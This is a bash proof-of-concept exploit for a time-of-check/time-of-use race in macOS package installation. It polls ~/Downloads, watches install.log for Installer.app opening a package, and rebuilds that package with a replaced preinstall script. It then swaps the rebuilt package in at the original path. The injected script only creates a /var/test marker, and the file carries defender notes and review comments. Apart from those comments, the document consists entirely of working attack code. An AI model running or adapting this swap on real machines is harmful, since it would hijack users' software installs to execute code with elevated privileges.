#!/bin/bash
# Proof-of-concept for a time-of-check/time-of-use window in macOS .pkg
# installation: the script waits for a package to appear in ~/Downloads,
# waits for the user to open it in Installer.app, then rebuilds the package
# with a replaced preinstall script and swaps it in at the original path.
#
# Defender notes (what this script leaves behind / what to watch for):
#   - a staging tree under /tmp/Install that is created, flattened and removed;
#   - repeated `pkgutil --expand*` / `pkgutil --flatten` invocations followed by
#     an `mv` onto a file in ~/Downloads while the installer is running;
#   - the marker file /var/test, which exists only if the replaced preinstall
#     script actually ran.
#   The rebuilt package is produced by `pkgutil --flatten` alone and is not
#   re-signed here, so package signature / notarization checks on the file in
#   ~/Downloads would no longer match the original (verify against your
#   platform's signing checks).

# Marker path written by the injected preinstall script (see the heredoc
# below). NOTE(review): this variable is declared but never referenced; the
# heredoc hardcodes the same path.
declare -r touch_path="/var/test"
# Staging directory for the expanded package. It is removed and recreated
# twice (before --expand-full and again after the installer opens the pkg).
declare -r expand_path="/tmp/Install"
# Glob listing line(s) from ~/Downloads that contain .dmg or .pkg.
declare possible_target
echo "Monitoring ~/Downloads for .pkg or .dmg files..."
# Poll the Downloads listing every 2 s until it contains ".dmg" or ".pkg".
# The pattern is an unanchored basic regex (the dot is a wildcard), so it
# matches those substrings anywhere in the single-line glob expansion.
while true; do
if echo ~/Downloads/* | grep -q '.dmg\|.pkg'; then
echo "Possible targets found..."
# Captures the whole matching line, i.e. the entire space-joined listing,
# not just the .pkg/.dmg entry.
possible_target=$(echo ~/Downloads/* | grep '.dmg\|.pkg')
break
fi
sleep 2
# Sleep so the Downloads listing is not re-evaluated several times a second.
done
# Only .pkg targets are expanded; a .dmg match falls through with the staging
# directory untouched. `--expand-full` also unpacks the payload.
if [[ "${possible_target}" =~ .pkg ]]; then
rm -rf "${expand_path:?}"
pkgutil --expand-full "${possible_target}" "${expand_path}"
fi
# Locate a preinstall (or, failing that, postinstall) script in the expanded
# tree. NOTE(review): the search path is hardcoded as /tmp/Install/ instead of
# "${expand_path}", so the two can drift apart if the constant is changed.
if preinstall_script=$(find /tmp/Install/ -name 'preinstall'); then
echo 'preinstall target found...'
elif postinstall_script=$(find /tmp/Install/ -name 'postinstall'); then
echo 'postinstall target found...'
fi
echo "Waiting for PKG installer to start..."
# Block until install.log records an installer opening a package. The tail is
# backgrounded inside a subshell; it is presumably left running after grep
# returns (no cleanup here) — an extra process a defender may observe.
( tail -f -n 0 /var/log/install.log & ) | grep -q 'Opened from:'
echo "PKG Install Detected"
# Take the most recent "Opened from:" log line; fields 7 onward are treated as
# the path of the package the user opened.
pkg_path=$(grep 'Opened from:' /var/log/install.log | tail -1 | cut -d ' ' -f7-)
echo "Expanding PKG"
# Plain --expand (no payload unpack) of the package the installer opened, into
# the same staging directory used above.
pkgutil --expand "${pkg_path}" "${expand_path}"
echo "Replacing preinstall"
# Overwrite the located preinstall script with a two-line script that creates
# the /var/test marker. The unquoted EOF delimiter performs expansion, but the
# body contains nothing to expand, so it is written literally.
cat <<EOF > "${preinstall_script}"
#!/bin/bash
touch /var/test
EOF
# NOTE(review): the flatten below is executed twice (here and two lines down);
# the second call overwrites the first's output with identical content.
pkgutil --flatten "${expand_path}" "${expand_path}.pkg"
echo "Flattening malicious PKG..."
pkgutil --flatten "${expand_path}" "${expand_path}.pkg"
echo "Removing ${pkg_path}"
# The swap: delete the package the installer opened and move the rebuilt one
# into its place. ":?" aborts if pkg_path is empty, which guards against
# running rm with no path if the log parse above yielded nothing.
rm -f "${pkg_path:?}"
echo "Replacing Install.pkg with malicious PKG"
mv "${expand_path}.pkg" "${pkg_path}"
echo "Removing Expanded PKG"
# Clean up the staging tree; only the swapped package and the marker remain.
rm -rf "${expand_path:?}"